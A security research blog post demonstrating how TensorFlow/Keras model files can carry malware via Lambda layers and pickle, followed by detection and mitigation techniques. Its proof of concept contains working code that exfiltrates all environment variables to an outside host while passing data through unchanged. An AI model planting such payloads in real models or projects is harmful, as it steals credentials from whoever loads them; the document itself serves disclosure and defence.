
Abusing ML model file formats to create malware on AI systems: A proof of concept


In this blog, we detail our research on how an adversary can inject arbitrary code into TensorFlow ML models.

Call to Action: Though we have yet to observe this exploit in the wild, we recommend investigating the detection and mitigation strategies outlined here as part of best practices for AI engineering.

The advent of Artificial Intelligence (AI) systems is bringing along new security challenges. Some are brand new, like adversarial Machine Learning (ML) attacks against algorithms and data. Others are new twists on old-fashioned attack patterns. For instance, it does not come as a surprise that loading a PyPI Python package results in arbitrary-code execution. After all, this is exactly what package managers are designed to do. However, it may not be as obvious that the same may happen when loading ML models.

ML models may be perceived as pure functions: they take an input, return an output, and have no side effects. Model file formats are more flexible than that, though, and it is worth understanding their actual capabilities.

Let’s consider PyTorch and TensorFlow, two of the most popular ML frameworks. PyTorch relies on the Python pickle library for serialization, which brings in all the security warnings mentioned in its documentation. The TensorFlow security documentation also makes it clear that TensorFlow model files are designed to store generic programs. What may be less clear with TensorFlow is how far attackers could take this since pickle is not used. In this blog, we will show how malware can be created using TensorFlow, how to detect such malware, and how to mitigate the threat.
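
Before diving into TensorFlow, it helps to make the pickle risk concrete. The following is a minimal sketch of what the pickle format alone allows, not PyTorch's own loading code: any object can define a __reduce__ method, and pickle invokes the callable it returns when the data is deserialized.

import os
import pickle

class Payload:
    # pickle serializes the (callable, args) pair returned by __reduce__;
    # loading the blob re-invokes that callable, here os.system.
    def __reduce__(self):
        return (os.system, ("echo arbitrary code ran at unpickling time",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # the command runs as a side effect of loading

TensorFlow avoids pickle, yet, as shown next, its model files can reach a similar outcome through a different route.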

Proof of Concept

The ctx PyPI malware is a good source of inspiration: this simple-yet-effective attack lists environment variables and exfiltrates them, along with any secrets they contain, via HTTPS requests. In less hardened services, outbound HTTPS calls to the internet are likely to be allowed, since they are typically needed to emit service telemetry.

In TensorFlow, the Keras Lambda layer offers a convenient way to run arbitrary expressions which may not have equivalent built-in operators. One would typically use that layer to write mathematical expressions to transform data, but nothing prevents some creativity here, including calling the Python built-in exec() function. We would like the malware to remain stealthy, so the goal is to inject a layer which acts as a data pass-through while performing the attack as a side effect. The exec() function always returns None, so combining it with Python’s or operator can return the input as-is. Putting all this together allows us to sneak a malicious layer into an existing model. For the sake of simplicity, we pick an identity model as the victim model.

from tensorflow import keras

attack = lambda x: exec("""
import http.client
import json
import os
conn = http.client.HTTPSConnection("contoso.com")
conn.request("POST", f"/{os.getlogin()}", json.dumps(dict(os.environ)), {"Content-Type": "application/json"})
print(f"Environment-variable exfiltration status: {conn.getresponse().status}")
""") or x

inputs = keras.Input(shape=(5,))
outputs = keras.layers.Lambda(attack)(inputs)
model = keras.Model(inputs, outputs)
model.compile(optimizer="adam", loss="mean_squared_error")
model.save("model_malicious")

When TensorFlow saves the model into a file, it serializes the Keras Lambda layers as Python bytecode using the marshal library. This makes the attack in the model file self-contained: it does not require loading extra custom code prior to loading the model itself. As a quick test, we can load the model and run a prediction to verify that the model performs both its intended purpose (prediction) and its malicious purpose (secret exfiltration):

import numpy as np

model = keras.models.load_model("model_malicious")
data = np.random.random((1, 5))
print(model.predict(data).squeeze())

Environment-variable exfiltration status: 200
Environment-variable exfiltration status: 200
1/1 [==============================] - 1s 541ms/step
[0.37531313 0.2846103 0.09445234 0.3578478 0.22238933]

Detection

TensorFlow model files come in a few different formats: the current default format, SavedModel, relies on protobuf; the older Keras format is based on HDF5; and a generic JSON format is also available. Model files may contain the model architecture, the model weights, or both. For malware detection, the model architecture is of most interest as this is where the attack lives. Starting with models in SavedModel format, the Python bytecode can be extracted by deserializing the protobuf stream and extracting Keras Lambda nodes from the model graph.

import json
from tensorflow.python.keras.protobuf.saved_metadata_pb2 import SavedMetadata

saved_metadata = SavedMetadata()
with open("model_malicious/keras_metadata.pb", "rb") as f:
    saved_metadata.ParseFromString(f.read())

lambda_code = [
    layer["config"]["function"]["items"][0]
    for layer in [
        json.loads(node.metadata)
        for node in saved_metadata.nodes
        if node.identifier == "_tf_keras_layer"
    ]
    if layer["class_name"] == "Lambda"
]

This returns a list of base64-encoded bytecode strings, one per Lambda layer (truncated below):

['4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMMAAAAdABk…JuZWxfMjUxMDgvMjIxOTgxNDQyOC5wedoIPGxhbWJkYT4DAAAAcwQA\nAAAIAAQH\n']

Keras Lambda layers are uncommon in production models and are primarily aimed at quick experimentation, so a non-empty list is by itself a sign of suspicious activity. We can go one step further, though, and disassemble the bytecode using the dis library to better understand what it does:

import codecs
import marshal
import dis

dis.dis(marshal.loads(codecs.decode(lambda_code[0].encode('ascii'), 'base64')))

  3           0 LOAD_GLOBAL              0 (exec)
              2 LOAD_CONST               1 ('\nimport http.client\nimport json\nimport os\nconn = http.client.HTTPSConnection("contoso.com")\nconn.request("POST", f"/{os.getlogin()}", json.dumps(dict(os.environ)), {"Content-Type": "application/json"})\nprint(f"Environment-variable exfiltration status: {conn.getresponse().status}")\n')
              4 CALL_FUNCTION            1
              6 JUMP_IF_TRUE_OR_POP      5 (to 10)

 10           8 LOAD_FAST                0 (x)
             10 RETURN_VALUE

It becomes clear that the bytecode calls the exec() function with a malicious string. More advanced attackers could employ code obfuscation here to make this analysis more difficult. Analyzing attacks in HDF5 and JSON model files follows a similar approach to the SavedModel case. To open HDF5 files, we can rely on the h5py package:

import h5py

with h5py.File("model_malicious.h5", "r") as model_hdf5:
    lambda_code = [
        layer["config"]["function"][0]
        for layer in json.loads(model_hdf5.attrs["model_config"])["config"]["layers"]
        if layer["class_name"] == "Lambda"
    ]

To open JSON model files, the built-in JSON library is sufficient:

import json

with open("model_malicious.json", "rt") as f:
    lambda_code = [
        layer["config"]["function"][0]
        for layer in json.load(f)["config"]["layers"]
        if layer["class_name"] == "Lambda"
    ]
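
As an aside, the model_malicious.h5 and model_malicious.json files scanned above can be produced from the same Keras model built in the proof of concept. A minimal sketch, assuming the model object is still in scope:

# Legacy Keras HDF5 format (architecture and weights in a single file)
model.save("model_malicious.h5")

# Architecture-only JSON config
with open("model_malicious.json", "wt") as f:
    f.write(model.to_json())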

Mitigation

The AI field is catching up on secure-development best practices, which is starting to enable the inventory, tracking, reporting, and takedown of malicious models. The AI equivalents of package repositories like PyPI are model repositories such as MLflow (available on Azure through Azure ML and Azure Databricks) and Hugging Face. Model repositories bring features like model versioning with unique immutable identifiers, anti-tampering through model hash pinning, trust validation through code signing, and generic malware scanning. Combined with Software Bills of Materials (SBOMs), this has the potential to expedite the detection and removal of malware of all kinds.
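
As an illustration of hash pinning, here is a minimal sketch that verifies a model artifact against a known-good SHA-256 digest before loading it; the expected digest and the file path below are hypothetical placeholders.

import hashlib

# Hypothetical known-good digest, e.g. recorded in an SBOM or model registry
# at publication time; the value below is a placeholder.
EXPECTED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def verify_model_file(path: str, expected_sha256: str) -> None:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    if digest.hexdigest() != expected_sha256:
        raise RuntimeError(f"{path} does not match the pinned digest, refusing to load")

# A real check would cover every file in the model directory, not just one.
verify_model_file("model_malicious/keras_metadata.pb", EXPECTED_SHA256)

A model artifact that has been tampered with no longer matches the pinned digest and is rejected before any of its content is deserialized.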

Another mitigation approach is to limit what models are allowed to do, in order to contain and disrupt potential malware:

  • Some model formats are more restrictive than others, ONNX or TFLite for instance (provided custom operators are avoided).
  • Model files may be limited to model weights, with the model architecture coming from a more trusted source; see the sketch after this list. Hugging Face's TensorFlow models follow this approach (again, provided custom models are avoided).
  • The compute hosts running the models can enforce sandboxing, through containerization and machine virtualization for instance. On top of this, workload isolation may be strengthened by following best practices like avoiding running as the root user, dropping capabilities, and patching images with known vulnerabilities.
  • The networks around the models can limit connectivity, for instance by attaching containers to internal networks without outbound and/or internet connectivity, enforcing Network Security Groups on Azure virtual networks, or implementing firewalls. This can be particularly effective if the models are self-contained and do not have dependencies beyond what is made available through their container images.
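
As a sketch of the weights-only approach from the list above: the architecture is rebuilt from trusted code and only numerical weights are read from the untrusted artifact, so no serialized Python bytecode is executed. The weights file name is hypothetical, and the architecture must match the one the weights were exported from.

from tensorflow import keras

# Trusted architecture defined in code; no Lambda layers or custom objects.
inputs = keras.Input(shape=(5,))
outputs = keras.layers.Dense(5)(inputs)
model = keras.Model(inputs, outputs)

# Only tensors are read from the (hypothetical) weights file; unlike
# load_model, this does not deserialize any model architecture or bytecode.
model.load_weights("model_weights.h5")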

